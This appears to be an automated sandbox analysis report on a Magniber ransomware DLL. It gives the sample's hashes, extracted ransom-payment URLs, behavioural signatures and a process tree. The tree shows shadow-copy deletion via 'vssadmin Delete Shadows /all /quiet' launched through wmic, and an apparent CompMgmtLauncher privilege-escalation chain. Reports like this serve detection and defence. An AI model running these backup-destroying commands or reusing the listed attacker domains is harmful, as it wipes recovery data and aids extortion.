Analysis
-
max time kernel
120s -
max time network
171s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
20-12-2023 15:48
General
-
Target
dd6d5b77ea31de026c8bfb867f14ed70.dll
-
Size
38KB
-
MD5
dd6d5b77ea31de026c8bfb867f14ed70
-
SHA1
7865af12c34f87e095ff70812eb753cf3f944449
-
SHA256
553e833cf333ad707a9aa18e01f6d9d4fca8935b92f15c5ddfee379eabcb9efa
-
SHA512
45f361bd370f83d07de54f21ea1beacca8fe98e12a1051f37dc8e690481675d838620d3a2cca107007981b30795afe2240de0ffff58dc3265d8e259c0fe6b220
-
SSDEEP
768:tpB71V2b/CK1xbFHq4VPQz+oNOOs792CZ9xJS/DR1snrFqJknw/Agw:B1S/CMbFrVPQCoDC2CbxO91qrFqSnw4g
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://0490ce38e86452609fjqzqma.r4vwwgioac7x2ftfglttr7qst265edv6rhmsdmjdgt6wxzuhgx4ynfid.onion/fjqzqma
http://0490ce38e86452609fjqzqma.phoneis.website/fjqzqma
http://0490ce38e86452609fjqzqma.donehim.space/fjqzqma
http://0490ce38e86452609fjqzqma.lessmod.quest/fjqzqma
http://0490ce38e86452609fjqzqma.fixkeys.top/fjqzqma
Signatures
-
Detect magniber ransomware 2 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (57) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 3 IoCs
-
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 11 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\dd6d5b77ea31de026c8bfb867f14ed70.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
-
-
-
-
C:\Windows\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cmd.execmd /c "start http://0490ce38e86452609fjqzqma.phoneis.website/fjqzqma^&2^&28521491^&57^&347^&12"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://0490ce38e86452609fjqzqma.phoneis.website/fjqzqma&2&28521491&57&347&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5f6fc005cb9b74081b0d055bc2f7a12b8
SHA1bdb3caebfee6edf69084a4cbff17d518568ca34d
SHA2567742782c50612b607eab00b551a197bfa0b518460cae5a3d5fe13a8b3085b0b5
SHA51253eb96e43f541434f1ab1ddb5bc8fab02d1edf2cf929815992d709525c3fed2eb40042e7a1ce1e7840ddbadc5e1dd33b955147ff42c7266267be463200a6333b
-
Filesize
344B
MD59e2dd06d02682adbb61586a2c6a58295
SHA1e8269d61749652eb072608b5fda1f005d1485c7e
SHA256684fac7e35409d5c2612c2016ae016de9c8eb36b51abab299dbfa0215f382721
SHA512cb490285fd0edf6abc0335a0c70691fcbf67c61eeb0ad53063936935f21fc83f47aacf69e30fc5743e2b2ea68f6589eccf8ecf5093cfafc848f7dbfb8787ef5f
-
Filesize
344B
MD5b1e9d95359f95fef508d6fa31b03f909
SHA1151ca2be6d15cc6e00b81f69910f95efccc46143
SHA2564666dfc64c0820e9ce22b45e2aecf76d271b943c78210ce28daa0867951477fb
SHA512f7d67640001be4a8d6f8014c14281532eebcaad3b35b5b59bcd632f82b728df358ed77af659deae78440d2370d5e3bbaa7938f71ab695e509ae62aeb0ba47da5
-
Filesize
344B
MD5b77a1b139d6442fb792d443a75375d89
SHA1347e53ef0a4694a5f5e26d6a4207c139fbaa089e
SHA256ef612d57890c1dcea10dc72f95ad95e7b88ab023a65c3b3496270f73d2eca90e
SHA51212255a033157a55562c3c198ebc1433e2652f3fd5dc7c05fd4dbb36fc03e9c325f78f3f9210f8a25812dea03512e690e232f894a4b0e7e9435a61fd66e5965a3
-
Filesize
344B
MD5197418a99fa9977aaa8f97b613125708
SHA1bfe88b59400528c3e3026594910d79e51785321d
SHA2569d73622da2b872e14d19a9d439f16305bdd9a576a8553aaded576a1edf5ef605
SHA512b8e5f61475669ba24e7e32a2c4192a4b5670dda109b6fc25ef34bb1379525737c2f741bbea282e92b64e3203838f3846a411e491a7ea6eafe26b58fde0d2f4ab
-
Filesize
344B
MD552c4871c5cbcd33893c399f13babc2db
SHA1e28ac244f18cd4d322aaf1a609ce34269d4b389a
SHA2566a8256615651b2ece6a51ae32d500b9e52a203a29f73cbf228f85ef943715c05
SHA512ff5eb2b4fce84adcc4a752956cd76be374f15bf97d12d60fde500af5dd450d434af6e66862757827b6fec85fee77f2478b8495d625044cac3eb850a9c8f4450d
-
Filesize
344B
MD5bb95ae3ffa8ce835bf0de9264f1ccb20
SHA1c2ffbd5c67280d9778650bfabff4e0cb645ec98c
SHA256ca3db448e4a0c647d7b1f6923f3d6906bc1d942e43352d97d645819f79c62937
SHA5128942c372e2bc6ea23e2dfe9ccdf7c0e2425322a181cb690203af1bb1a8aaa33a71280d9c746f89941d3b2e06ef037585649fd88134b031cc591e2c959e6cb527
-
Filesize
344B
MD5f5e31eb58434375d56dcf01faebe9adf
SHA1d5c712d7d79c059672acbf40105bddf599e9d61c
SHA2561069b3b56d7153035d06e56e67c977ff38d69c941436bc48c57a7c5409072b6a
SHA512bec670f9eff5ccb48a348818c98c9ad4cc99e42a0bda9f800cad2470e1179508b0161c7de15a246bf23213f5bf9c28e8c7a83ff5ab588726785927a9bfbac3a7
-
Filesize
344B
MD55972b3c6338a40e5215738813e3eaf4e
SHA114152972a8304e76f7d5b4d5d07183190c916ee0
SHA25665fe5b33a88662ccb54e6baac869903f24fe0cd2c2cda64b7bfedfbefd8fe92e
SHA512ca3f190778f9e0d5bf99e20d233afda75353b2695b2b0f4affad7b8ea5a4519fc653f0571cb00660b44a8a919babf7cd725529d86a9afec033669b0b84215ca5
-
Filesize
344B
MD594a717361610b703cc1eacd5e0bf71a0
SHA11f0063843217e700236c473915f2dd02d87b2d22
SHA25640f7d0cc42a04e492fa3dc778426f0e98effd8b3c94c39f0685d321acda9365f
SHA512a613c18a90e4a3025450c1195254c474f263677903883c6fb5abc5398d45c605fd689aafde800316d27cb5cf3776c4de0510bf9b3d28b1b899145a593df2b5e3
-
Filesize
344B
MD51b57b082ada394854806fcab71c64468
SHA1c3a71d3bb16c454a3a6df912877bd92f283a832f
SHA2560d9da30c32ee5e48b7118091b0951c59aace7cf3cbae3680ca5da5d822bbc217
SHA512a839ffe50c4e46d12c440447901c2802ce36458743d40111b8481671e9e983a41e9e128f0327674660db416d6e5ff55fc9abd466d0a9477ed0f5fc2e20da8e56
-
Filesize
344B
MD5dbcec9ae361e583ecf4645435d84af08
SHA16646e17c51c1029b955d34fb401e7ce6bb00ba2e
SHA256c6c6f8f182d5fd696955542297845a9551675d995dbf0ea427979c1de66c24da
SHA512404c406a55b5c62eead92626e5e43cc741c9807115376951c813f8d6bd71ed051ca25bbab71b008b40cd425c86fb6bb38bd8c0f5e08f47180b4fb8864c486088
-
Filesize
344B
MD5a8a0d31e8e8f927fc74168ea81372c6f
SHA1be501f3889525b327e2ed03294782f85309c3f4f
SHA2567c32befc33c2885823ceed5a1aa5a51d2a566b55d914bfe217cbe303a29595e5
SHA512a77c48f3c4f7d54c3df84a1358948875f31e39f314df087c6314d22508023ea5b4a3158a9abbd22ec983beadc4af63a0dcd40b0bb217abc0336d1615e545f4e3
-
Filesize
344B
MD5cd28de6e3e4df906a73d6d92f6784e23
SHA1694bf0ec1f5c6021671993507b4fe5be9b83f8ae
SHA2565faf9b7307b369a4100d5273cf70d6a6de9853e099ab50d0e3612e95607e16a8
SHA512fd06d8dfb1d30e1cefb2d67ac4c2e02b17f68533592336930071c96630f740472366adb3b380e0de611f678b53885ab678651bd1487ea6cb4904d0cec8c7299b
-
Filesize
344B
MD5cbec0c33af126b823c86f16ca68516ae
SHA16ad49bb62b9659429c54e73fe9bd9c6501c651b6
SHA256326548c1067980f0ae99ba5d046e5cfd40436be1949f6e7818ad1bbdeaf79bd4
SHA512aaac70430eda78b9b104c9d676d51f97afe87d78acca0b766c097b80287c6ce818b3f28446c860e6059651a4e87cbcb78148d4ed59377fd4e004243eb8d4dd5c
-
Filesize
344B
MD5bf65b772c839cb7252c2c431cf3721ca
SHA1cd302ed25f5506d2d880b5b713db9e05ff0b0a78
SHA2560f094e4ddeae3a7e1bd12f248dfab482ce03fc66fa756aa5e995a024c1498bf9
SHA512834095ffff970c803365b606ec0b68f187b8e73b0d0ba3ee4c1fd91d4af9c25597a1c30398aed1b203f593a6f597f7199b01b02e59ba04e7a818fe5a7c2e2864
-
Filesize
344B
MD51d71a88bc4981a4b0bbfc9b32c3406ea
SHA12c4750ef83424bc04e6444bffc9790d10efab343
SHA25630341f188c154552cd43b4b7e898a3a2d50d4f3b69d7f26cb4d2b45fa36257f6
SHA512fb51156dae290a29f042083be2e3eede9a25e73b09159b711313b83814af4eea67ebfe26a2314750d5bcc38ede47a5b4815e1a660ebb1a2e1081234be6d8c3e6
-
Filesize
344B
MD531237c863eed48b816dbe0ac7ad2b63c
SHA1baaf96ddd27dff13efe1b89ec864f41b0e055cd5
SHA256f2adcab131a06210a151f9bf7b3dfe87612bb7d7bf6c68fb57c6b59f5b6c0ba2
SHA512bc93872199b08501c2eefcdac2783e5b86be18e6a79629a0c5bc9b56e3c47047398a187b28008c88bc9bb942189ffee9627179ae9e8c6bde5441e02fefb11db4
-
Filesize
344B
MD5a25201aa66fed9efc8896097bbbaa187
SHA104065dd4cb4d5d0307a263e6a6e4bd9fdce5ce91
SHA256ba0df945079836ea228d71debd0fd9b5749273fd93c6ca32e0e8238a2e93ff71
SHA5122fa363502ff9b575bc6d98826a89961c559cf22950b2e735db0682ffed62a7f603d85ecb93e4c9de38a01164d05a08b3c1ec76e0e300dd39453872d83391bc6a
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
1KB
MD57a4450324c59d7ab3a30a66a2be7d95a
SHA1eaf9dae31f62af21887f7a1286109d60b26dcf53
SHA25662bcc297e22a97db8d4f9db6aa1abaae403cf5c17a33973357d6a085a3388033
SHA51231dbc547f47e781bcceb228986c6002ed8ab4a0bc4a425aea06a4d3b1a9afe8e3150b4997a9909e4f59a88345398acaaebea2557c303d46543734c97b055150d
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB